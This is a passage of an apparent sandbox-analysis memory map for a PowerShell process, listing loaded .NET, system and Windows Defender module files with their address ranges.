"\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\f8f2f5ae61333087d91e84e98442197c\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\f8f2f5ae61333087d91e84e98442197c\\microsoft.management.infrastructure.ni.dll") Region: id = 3389 start_va = 0x7fffbc770000 end_va = 0x7fffbc77bfff monitored = 0 entry_point = 0x7fffbc775030 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 3390 start_va = 0x1a9a0000 end_va = 0x1a9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9a0000" filename = "" Region: id = 3391 start_va = 0x7fffa4460000 end_va = 0x7fffa45c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\5e0d65edc2896cdb05874abda7e36dca\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\5e0d65edc2896cdb05874abda7e36dca\\system.management.ni.dll") Region: id = 3392 start_va = 0x7fffabbf0000 end_va = 0x7fffabd55fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\f87e7f9015ee7fb19ce758d568e10549\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\f87e7f9015ee7fb19ce758d568e10549\\system.directoryservices.ni.dll") Region: id = 3393 start_va = 0x7fffa35d0000 end_va = 0x7fffa3e7afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\238862161c05eb67325815002be6719c\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\238862161c05eb67325815002be6719c\\system.xml.ni.dll") Region: id = 3394 start_va = 0x7fffbc710000 end_va = 0x7fffbc760fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\4240c1c46430939704b0dd1780ab6e9f\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\4240c1c46430939704b0dd1780ab6e9f\\system.numerics.ni.dll") Region: id = 3409 start_va = 0x7fffa06a0000 end_va = 0x7fffa100ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\0bbc6f96945d8cdf3e6f0cc46caeac0b\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\0bbc6f96945d8cdf3e6f0cc46caeac0b\\system.data.ni.dll") Region: id = 3410 start_va = 0x7fffa0330000 end_va = 0x7fffa0698fff monitored = 1 entry_point = 0x7fffa047a3de region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3411 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3412 start_va = 0x1aae0000 end_va = 0x1ae40fff monitored = 1 entry_point = 0x1ac2a3de region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3413 start_va = 0x7fff48070000 end_va = 0x7fff4807ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48070000" filename = "" Region: id = 3414 start_va = 0x1a670000 end_va = 0x1a6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a670000" filename = "" Region: id = 3415 start_va = 0x7fffa83a0000 end_va = 0x7fffa84d2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\9e05584a25afa1da195dc4959a902595\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\9e05584a25afa1da195dc4959a902595\\system.configuration.ni.dll") Region: id = 3416 start_va = 0x1a9b0000 end_va = 0x1a9b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3417 start_va = 0x7fff48080000 end_va = 0x7fff4808ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48080000" filename = "" Region: id = 3418 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3419 start_va = 0x1a9d0000 end_va = 0x1a9dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3420 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3421 start_va = 0x1a9d0000 end_va = 0x1a9dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3422 start_va = 0x1a9c0000 end_va = 0x1a9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3423 start_va = 0x1a9c0000 end_va = 0x1a9cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3424 start_va = 0x1a9c0000 end_va = 0x1a9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3425 start_va = 0x1a9c0000 end_va = 0x1a9cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3426 start_va = 0x1a9c0000 end_va = 0x1a9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3427 start_va = 0x1a9c0000 end_va = 0x1a9cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3428 start_va = 0x1aae0000 end_va = 0x1ab5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aae0000" filename = "" Region: id = 3429 start_va = 0x1ab60000 end_va = 0x1abdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab60000" filename = "" Region: id = 3430 start_va = 0x7fff48090000 end_va = 0x7fff4809ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48090000" filename = "" Region: id = 3431 start_va = 0x7fffab9b0000 end_va = 0x7fffabafefff monitored = 1 entry_point = 0x7fffab9b1090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 3432 start_va = 0x1a670000 end_va = 0x1a67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a670000" filename = "" Region: id = 3433 start_va = 0x1a680000 end_va = 0x1a68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a680000" filename = "" Region: id = 3434 start_va = 0x7fff480a0000 end_va = 0x7fff480affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480a0000" filename = "" Region: id = 3435 start_va = 0x7fffadf60000 end_va = 0x7fffadfc1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\4e1b2f1d1e853a774b9a06a9bcd657ec\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\4e1b2f1d1e853a774b9a06a9bcd657ec\\microsoft.powershell.security.ni.dll") Region: id = 3436 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3437 start_va = 0x7fffa4380000 end_va = 0x7fffa445afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\430a9e8244a211240808d63b95b9d4c8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\430a9e8244a211240808d63b95b9d4c8\\system.transactions.ni.dll") Region: id = 3438 start_va = 0x7fffbc6c0000 end_va = 0x7fffbc70efff monitored = 1 entry_point = 0x7fffbc6e0902 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3439 start_va = 0x1ac20000 end_va = 0x1ac6cfff monitored = 1 entry_point = 0x1ac40902 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3440 start_va = 0x7fff480b0000 end_va = 0x7fff480bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480b0000" filename = "" Region: id = 3441 start_va = 0x7fffb5d40000 end_va = 0x7fffb5d4bfff monitored = 0 entry_point = 0x7fffb5d42560 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3442 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3466 start_va = 0x1ac20000 end_va = 0x1ac9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac20000" filename = "" Region: id = 3467 start_va = 0x7fff480c0000 end_va = 0x7fff480cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480c0000" filename = "" Region: id = 3468 start_va = 0x7fff480d0000 end_va = 0x7fff480dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480d0000" filename = "" Region: id = 3469 start_va = 0x7fff480e0000 end_va = 0x7fff480effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480e0000" filename = "" Region: id = 3470 start_va = 0x7fff480f0000 end_va = 0x7fff480fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff480f0000" filename = "" Region: id = 3471 start_va = 0x7fff48100000 end_va = 0x7fff4810ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48100000" filename = "" Region: id = 3472 start_va = 0x7fff48110000 end_va = 0x7fff4811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48110000" filename = "" Region: id = 3473 start_va = 0x7fff48120000 end_va = 0x7fff4812ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48120000" filename = "" Region: id = 3474 start_va = 0x7fff48130000 end_va = 0x7fff4813ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48130000" filename = "" Region: id = 3475 start_va = 0x7fff48140000 end_va = 0x7fff4814ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48140000" filename = "" Region: id = 3476 start_va = 0x7fff48150000 end_va = 0x7fff4815ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48150000" filename = "" Region: id = 3477 start_va = 0x7fff48160000 end_va = 0x7fff4816ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48160000" filename = "" Region: id = 3478 start_va = 0x7fff48170000 end_va = 0x7fff4817ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48170000" filename = "" Region: id = 3479 start_va = 0x7fff48180000 end_va = 0x7fff4818ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48180000" filename = "" Region: id = 3480 start_va = 0x7fff48190000 end_va = 0x7fff4819ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48190000" filename = "" Region: id = 3481 start_va = 0x7fff481a0000 end_va = 0x7fff481affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481a0000" filename = "" Region: id = 3482 start_va = 0x7fff481b0000 end_va = 0x7fff481bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481b0000" filename = "" Region: id = 3483 start_va = 0x1aca0000 end_va = 0x1b62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 3484 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3485 start_va = 0x1a680000 end_va = 0x1a68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a680000" filename = "" Region: id = 3486 start_va = 0x7fff481c0000 end_va = 0x7fff481cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481c0000" filename = "" Region: id = 3487 start_va = 0x7fffa3f90000 end_va = 0x7fffa4078fff monitored = 0 entry_point = 0x7fffa401be70 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 3488 start_va = 0x1a690000 end_va = 0x1a693fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 3489 start_va = 0x1a690000 end_va = 0x1a693fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 3490 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3491 start_va = 0x7fff481d0000 end_va = 0x7fff481dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481d0000" filename = "" Region: id = 3492 start_va = 0x1a690000 end_va = 0x1a69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 3493 start_va = 0x1a690000 end_va = 0x1a69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 3494 start_va = 0x1a690000 end_va = 0x1a69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 3500 start_va = 0x1a690000 end_va = 0x1a69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 3501 start_va = 0x1a6a0000 end_va = 0x1a6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a6a0000" filename = "" Region: id = 3502 start_va = 0x1a690000 end_va = 0x1a69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 3503 start_va = 0x1a6a0000 end_va = 0x1a6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a6a0000" filename = "" Region: id = 3504 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3505 start_va = 0x1b630000 end_va = 0x1b82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b630000" filename = "" Region: id = 3506 start_va = 0x1b830000 end_va = 0x1b86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b830000" filename = "" Region: id = 3507 start_va = 0x1a690000 end_va = 0x1a6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a690000" filename = "" Region: id = 3508 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "defender.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1") Region: id = 3509 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "defender.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1") Region: id = 3510 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3511 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3512 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpcomputerstatus.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml") Region: id = 3513 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3514 start_va = 0x7fff481e0000 end_va = 0x7fff481effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481e0000" filename = "" Region: id = 3515 start_va = 0x7fffad930000 end_va = 0x7fffadb64fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\4b76f649191e82611b217d651ae1d75b\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pae3498d9#\\4b76f649191e82611b217d651ae1d75b\\microsoft.powershell.commands.management.ni.dll") Region: id = 3516 start_va = 0x7fff481f0000 end_va = 0x7fff481fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff481f0000" filename = "" Region: id = 3517 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3519 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3520 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3521 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3522 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3523 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3524 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3525 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3526 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3527 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3528 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3529 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3530 start_va = 0x7fff48200000 end_va = 0x7fff4820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48200000" filename = "" Region: id = 3531 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3532 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3533 start_va = 0x1abe0000 end_va = 0x1abeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3534 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3535 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3536 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mppreference.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml") Region: id = 3537 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mppreference.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml") Region: id = 3538 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3540 start_va = 0x1abe0000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abe0000" filename = "" Region: id = 3541 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreat.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml") Region: id = 3542 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3543 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreatcatalog.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml") Region: id = 3544 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3545 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpthreatdetection.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml") Region: id = 3546 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat") Region: id = 3547 start_va = 0x1a9c0000 end_va = 0x1a9c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msft_mpscan.cdxml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml") Region: id = 3548 start_va = 0x1a9c0000 end_va = 0x1a9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows-defender-management-powershell-group-package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat" (normalized: 